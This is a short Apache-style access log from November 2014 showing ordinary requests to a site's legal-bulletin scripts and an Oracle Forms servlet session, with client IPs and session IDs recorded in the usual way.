66.249.65.115 - - [30/Nov/2014:11:10:30 -0500] "GET /BLA/resoluciones/AUTOS%202011/5775.pdf HTTP/1.1" 304 -
190.85.132.209 - - [30/Nov/2014:11:10:31 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
190.26.187.219 - - [30/Nov/2014:11:10:31 -0500] "GET /forms/java/java/awt/event/MouseWheelListener.class HTTP/1.1" 404 356
190.85.132.209 - - [30/Nov/2014:11:10:31 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
190.85.132.209 - - [30/Nov/2014:11:10:31 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
190.26.187.219 - - [30/Nov/2014:11:10:31 -0500] "GET /forms/java/java/awt/event/MouseWheelListener.class HTTP/1.1" 404 356
190.26.187.219 - - [30/Nov/2014:11:10:31 -0500] "GET /forms/java/oracle/forms/registry/Registry.dat HTTP/1.1" 200 4213
190.26.187.219 - - [30/Nov/2014:11:10:32 -0500] "GET /forms/java/oracle/forms/registry/default.dat HTTP/1.1" 404 350
190.26.187.219 - - [30/Nov/2014:11:10:32 -0500] "GET /forms/frmservlet?config=sia&acceptLanguage=es-ES&ifcmd=startsession HTTP/1.1" 200 119
190.26.187.219 - - [30/Nov/2014:11:10:32 -0500] "GET /forms/lservlet;jsessionid=ac16012b30d5ede70370de06477383c4a705c260a47a.e3iSbxaKaheRe34Sa3yKbhiTahb0n6jAmljGr5XDqQLvpAe?ifcmd=getinfo&ifhost=Chirley&ifip=192.168.0.8 HTTP/1.1" 200 8
190.26.187.219 - - [30/Nov/2014:11:10:32 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d5ede70370de06477383c4a705c260a47a.e3iSbxaKaheRe34Sa3yKbhiTahb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 8
190.26.187.219 - - [30/Nov/2014:11:10:32 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d5ede70370de06477383c4a705c260a47a.e3iSbxaKaheRe34Sa3yKbhiTahb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 64000
190.26.187.219 - - [30/Nov/2014:11:10:33 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d5ede70370de06477383c4a705c260a47a.e3iSbxaKaheRe34Sa3yKbhiTahb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 64000
190.26.187.219 - - [30/Nov/2014:11:10:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d5ede70370de06477383c4a705c260a47a.e3iSbxaKaheRe34Sa3yKbhiTahb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 63623
190.26.187.219 - - [30/Nov/2014:11:10:36 -0500] "HEAD /imagenes/dama_logo.gif HTTP/1.1" 200 -
190.26.187.219 - - [30/Nov/2014:11:10:36 -0500] "GET /imagenes/dama_logo.gif HTTP/1.1" 200 21482
190.26.187.219 - - [30/Nov/2014:11:10:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d5ede70370de06477383c4a705c260a47a.e3iSbxaKaheRe34Sa3yKbhiTahb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
190.26.187.219 - - [30/Nov/2014:11:10:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d5ede70370de06477383c4a705c260a47a.e3iSbxaKaheRe34Sa3yKbhiTahb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 7990
190.26.187.219 - - [30/Nov/2014:11:10:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d5ede70370de06477383c4a705c260a47a.e3iSbxaKaheRe34Sa3yKbhiTahb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 64
